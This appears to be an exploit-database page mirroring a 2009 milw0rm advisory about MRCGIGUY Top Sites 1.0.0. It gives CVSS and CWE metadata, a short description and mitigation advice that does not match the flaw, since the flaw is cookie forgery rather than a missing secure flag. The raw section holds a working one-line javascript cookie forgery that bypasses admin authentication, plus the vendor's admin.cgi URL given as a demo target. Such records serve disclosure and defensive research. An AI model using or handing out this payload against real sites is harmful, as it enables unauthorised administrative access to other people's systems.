header-logo
Suggest Exploit
vendor:
MRCGIGUY Top Sites
by:
ThE g0bL!N
7,5
CVSS
HIGH
Insecure Cookie Handling
614
CWE
Product Name: MRCGIGUY Top Sites
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:mrcgiguy:mrcgiguy_top_sites:1.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

MRCGIGUY Top Sites1.0.0 Insecure Cookie Handling

A vulnerability in MRCGIGUY Top Sites1.0.0 allows an attacker to set an insecure cookie, allowing them to gain access to the admin panel without authentication.

Mitigation:

Ensure that all cookies are set with the secure flag, and that all authentication is done over HTTPS.
Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
MRCGIGUY Top Sites1.0.0 Insecure Cookie Handling
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.mrcgiguy.com
MRCGIGUY Top Sites1.0.0
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="clickbank=Logged+In;path=/";
----------------------------------------------------------------
Dem0
----
http://www.mrcgiguy.com/cgi-bin/topsites/admin.cgi
--------------------------------------
Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]

Navigation

Suggest Exploit

Services By CQR